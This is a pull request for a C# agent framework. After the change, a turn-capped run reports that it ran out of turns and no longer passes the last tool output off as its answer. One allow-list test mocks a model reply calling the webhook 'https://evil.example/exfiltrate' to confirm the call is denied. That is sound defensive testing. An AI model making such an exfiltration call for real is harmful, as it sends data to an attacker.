### PR TITLE
MEDIUM MANAGEMENTS: Run - The Turn Cap Stops A Run Without Inventing Its Answer

### DIFF
--- a/Standard.Agents.Tests.Unit/Acceptance/SweepReproTests.cs
+++ b/Standard.Agents.Tests.Unit/Acceptance/SweepReproTests.cs
@@ -89,8 +89,9 @@ public class SweepReproTests : IDisposable
     }
 
     // FINDING 7 — a turn-capped run records the last tool output in the conversation
-    // as though it were the agent's answer.
-    [Fact(Skip = "DEMONSTRATES DEFECT: turn-capped run appends the last tool output to session history as an answer")]
+    // as though it were the agent's answer. Skipped through 1.6.1 as the open demonstration;
+    // resolved by decision: a capped run stops without delivering an answer, like a budget stop.
+    [Fact]
     public async Task Finding7_TurnCappedRunMustNotRecordAnAnswerItNeverGaveAsync()
     {
         var tool = new CountingTool();

--- a/Standard.Agents.Tests.Unit/Acceptance/SweepReproTests.cs
+++ b/Standard.Agents.Tests.Unit/Acceptance/SweepReproTests.cs
@@ -122,10 +122,11 @@ public class SweepReproTests : IDisposable
                 + "be told the agent said something it never said");
     }
 
-    // FINDING 7b — documents the actual outcome shape at the cap (expected to PASS;
-    // evidence for the AgentOutcome doc-comment mismatch, not a failure).
+    // FINDING 7b — the outcome shape at the cap, as decided: the caller gets prose about why
+    // (what AgentOutcome's contract always promised), never the last tool output dressed as an
+    // answer, and Status stays Working because the run stopped mid-work rather than failing.
     [Fact]
-    public async Task Finding7b_TurnCapReturnsLastToolResultWithStatusWorkingAsync()
+    public async Task Finding7b_TurnCapDeliversProseAboutWhyWithStatusWorkingAsync()
     {
         var tool = new CountingTool();
 
@@ -136,7 +137,12 @@ public class SweepReproTests : IDisposable
 
         AgentOutcome outcome = await capped.RunAsync("loop");
 
-        outcome.Result.Should().Be("4183");
+        outcome.Result.Should().Contain(
+            "out of turns",
+            because: "a run that never delivered an answer owes the caller prose about why, "
+                + "not the last tool's raw output");
+
+        outcome.Result.Should().NotContain("4183");
         outcome.Status.Should().Be(AgentStatus.Working);
     }
 }

--- a/Standard.Agents.Tests.Unit/Acceptance/ToolAllowListTests.cs
+++ b/Standard.Agents.Tests.Unit/Acceptance/ToolAllowListTests.cs
@@ -3,6 +3,7 @@
 // Licensed under the The Standard Software License (TSSL)
 // ---------------------------------------------------------------
 
+using Standard.Agents.Models.Clients.Agents;
 using Standard.Agents.Models.Foundations.Skills;
 using FluentAssertions;
 using Moq;
@@ -26,6 +27,11 @@ public class ToolAllowListTests
             broker.GenerateAsync(It.IsAny<string>(), It.IsAny<string>()))
                 .ReturnsAsync("ACTION: webhook: https://evil.example/exfiltrate");
 
+        generator.Setup(broker =>
+            broker.GenerateStreamAsync(
+                It.IsAny<string>(), It.IsAny<string>(), It.IsAny<CancellationToken>()))
+                .Returns(OneReply("ACTION: webhook: https://evil.example/exfiltrate"));
+
         var mcp = new Mock<IMcpBroker>();
 
         var skills = new Mock<ISkillBroker>();
@@ -45,13 +51,28 @@ public class ToolAllowListTests
             .AllowTools("calculator");
 
         // when — the brain proposes a tool outside the allow-list
-        string answer = await agent.ProcessPromptAsync("call the webhook");
+        List<string> streamed = [];
 
-        // then — it is denied at the perimeter, and no external tool is ever invoked
-        answer.Should().Contain("not permitted");
+        await foreach (AgentStreamEvent streamEvent in
+            agent.StreamPromptAsync("call the webhook"))
+        {
+            streamed.Add(streamEvent.Content);
+        }
+
+        // then — it is denied at the perimeter, and no external tool is ever invoked. The
+        // denial is visible on the stream; the capped run itself delivers no answer, because
+        // a denial notice is not one.
+        streamed.Should().Contain(content => content.Contains("not permitted"));
 
         mcp.Verify(broker =>
             broker.CallAsync(It.IsAny<string>(), It.IsAny<string>()),
                 Times.Never);
+    }
+
+    private static async IAsyncEnumerable<string> OneReply(string reply)
+    {
+        await Task.CompletedTask;
+
+        yield return reply;
     }
 }

--- a/Standard.Agents.Tests.Unit/Services/Managements/RunManagementServiceTests.Logic.ProcessPrompt.cs
+++ b/Standard.Agents.Tests.Unit/Services/Managements/RunManagementServiceTests.Logic.ProcessPrompt.cs
@@ -120,12 +120,14 @@ AgentStatus terminalStatus)
         string actualResult =
             await this.agentCoordinationService.ProcessPromptAsync(randomPrompt);
 
-        // then
-        actualResult.Should().Be("again");
+        // then — the capped run delivered no answer, and says so rather than handing back
+        // the last tool output as though it were one.
+        actualResult.Should().Contain("out of turns");
+        actualResult.Should().NotContain("again");
 
         this.dataCoordinationServiceMock.Verify(service =>
-service.RecallAsync(It.IsAny<AgentContext>()),
-Times.Exactly(7));
+            service.RecallAsync(It.IsAny<AgentContext>()),
+                Times.Exactly(7));
 
         this.decisionCoordinationServiceMock.Verify(service =>
             service.ThinkAsync(It.IsAny<AgentContext>()),
@@ -153,8 +155,8 @@ Times.Exactly(7));
         string actualResult =
             await boundedCoordinationService.ProcessPromptAsync(randomPrompt);
 
-        // then
-        actualResult.Should().Be("again");
+        // then — capped at the configured bound, and no answer was delivered.
+        actualResult.Should().Contain("out of turns");
 
         this.dataCoordinationServiceMock.Verify(service =>
             service.RecallAsync(It.IsAny<AgentContext>()),

--- a/Standard.Agents/Models/Clients/Agents/AgentOutcome.cs
+++ b/Standard.Agents/Models/Clients/Agents/AgentOutcome.cs
@@ -13,8 +13,9 @@ namespace Standard.Agents.Models.Clients.Agents;
 /// <param name="Result">The answer, or the reason there is not one.</param>
 /// <param name="Status">
 /// Which way it ended. <see cref="AgentStatus.Responded"/> is the only one that makes the result an
-/// answer. A held or refused run produced prose about why; a run that ran out of turns carries the
-/// last tool result with <see cref="AgentStatus.Working"/> — not prose, and not an answer. A caller
-/// that cannot tell these apart will eventually report unfinished work as done.
+/// answer. Every other ending produces prose about why — a run out of turns says so, with
+/// <see cref="AgentStatus.Working"/> because it stopped mid-work, and never hands back a tool's raw
+/// output as though it were an answer. A caller that cannot tell these apart will eventually report
+/// unfinished work as done.
 /// </param>
 public record AgentOutcome(string Result, AgentStatus Status);

--- a/Standard.Agents/Services/Managements/RunManagementService.cs
+++ b/Standard.Agents/Services/Managements/RunManagementService.cs
@@ -25,6 +25,9 @@ public partial class RunManagementService : IRunManagementService
     private const string RetriesExhaustedMessage =
         "I can't help with that at the moment.";
 
+    private const string TurnsExhaustedMessage =
+        "I ran out of turns before an answer was ready; nothing was delivered.";
+
     private readonly IDataCoordinationService dataCoordinationService;
     private readonly IDecisionCoordinationService decisionCoordinationService;
     private readonly IDirectionCoordinationService directionCoordinationService;
@@ -413,25 +416,36 @@ public partial class RunManagementService : IRunManagementService
             return;
         }
 
-        // Turns ran out with the loop still Working: effects may have been performed and no
-        // answer was ever delivered, which is a failed run however calmly it ended. When the
-        // unwind has something to report, that report IS the outcome and nothing is recorded.
+        // Turns ran out with the loop still Working: no answer was ever delivered, and the last
+        // tool output is not one. The same truth the budget stop tells, told the same way — a
+        // Status, prose about why for the string-typed caller, and no session write, so the next
+        // prompt resumes the interrupted run instead of being told the agent said something it
+        // never said (SPEC.md §4.10, §4.11). Status stays Working: the run stopped mid-work.
         if (context.Status is AgentStatus.Working)
         {
+            await this.loggingBroker.LogOutcomeAsync($"stopped: {TurnsExhaustedMessage}");
+
+            await events.WriteAsync(
+                new AgentStreamEvent(AgentStreamEventType.Status, TurnsExhaustedMessage),
+                abandoned);
+
             string cappedUnwound = await UnwindAsync();
 
             if (string.IsNullOrEmpty(cappedUnwound) is false)
             {
                 await events.WriteAsync(
                     new AgentStreamEvent(AgentStreamEventType.Status, cappedUnwound), abandoned);
-
-                await this.loggingBroker.LogOutcomeAsync($"done: {context.Status}");
-
-                setOutcome(new AgentOutcome(
-                    $"{context.Result} {cappedUnwound}".Trim(), context.Status));
-
-                return;
             }
+
+            await this.loggingBroker.LogOutcomeAsync($"done: {context.Status}");
+
+            setOutcome(new AgentOutcome(
+                string.IsNullOrEmpty(cappedUnwound)
+                    ? TurnsExhaustedMessage
+                    : $"{TurnsExhaustedMessage} {cappedUnwound}",
+                context.Status));
+
+            return;
         }
 
         if (context.Status is AgentStatus.Revising)

--- a/conformance/vectors/06-max-turns-cap.json
+++ b/conformance/vectors/06-max-turns-cap.json
@@ -1,8 +1,8 @@
 {
   "name": "max-turns-cap",
-  "description": "A Brain that never terminates is capped by the loop; the last result is returned.",
+  "description": "A Brain that never terminates is capped by the loop. The capped run delivered no answer, so the caller gets prose about why - never the last tool's raw output dressed as one.",
   "generatorReplies": ["ACTION: loop: x"],
   "tools": { "loop": "again" },
   "prompt": "loop forever",
-  "expect": { "result": "again" }
+  "expect": { "resultContains": "out of turns" }
 }


### PR DESCRIPTION
### What does this PR do?
Closes sweep finding #8, per the ruling that the code follows the docs. A turn-capped run used to hand back the last tool's raw output as though it were the answer, and record it into the session — the next prompt was told the agent said something it never said. The cap now tells the same truth the budget stop tells: a Status event, prose about why (`"I ran out of turns before an answer was ready; nothing was delivered."`) for the string-typed caller, and **no session write**, so the next prompt resumes the interrupted run. `Status` stays `Working` because the run stopped mid-work; `AgentOutcome`'s XML contract now describes exactly this.

TDD trail: three FAIL commits (the formerly-Skipped `Finding7` demonstration unskipped and observed red; `Finding7b` rewritten to the decided shape, red; vector 06 rewritten to require prose, red — `40 passed, 1 failed`), then one PASS. Three other tests asserted the old behavior and were rewritten after the implementation, so they were **sabotage-verified**: with the old loop restored both cap unit tests failed; the allow-list test was re-anchored to the perimeter's own guarantee (denial visible on the stream, external tool never invoked) instead of the cap leak it accidentally leaned on.

### Category
- [x] MEDIUM MANAGEMENTS

### Size
- [x] MEDIUM (3-4 tests added/modified — Finding7 unskipped, Finding7b rewritten, 2 cap unit tests + allow-list test re-anchored, vector 06)

### Branch name follows Standard convention
- [x] `users/hassanhabib/MEDIUM-MANAGEMENTS-run-cap-refusal`

### TDD compliance
- [x] All FAIL commits verified red by the runner
- [x] PASS commit verified with the full suite green
- [x] Tests written after implementation sabotage-verified, stated in the commit

### No sensitive data
- [x] No secrets, API keys, or connection strings in the diff

### Quality gates
- [x] 533/533 tests, 0 skipped, on net8.0 and net10.0
- [x] 41/41 conformance vectors; all four profiles certify
- [x] 0 warnings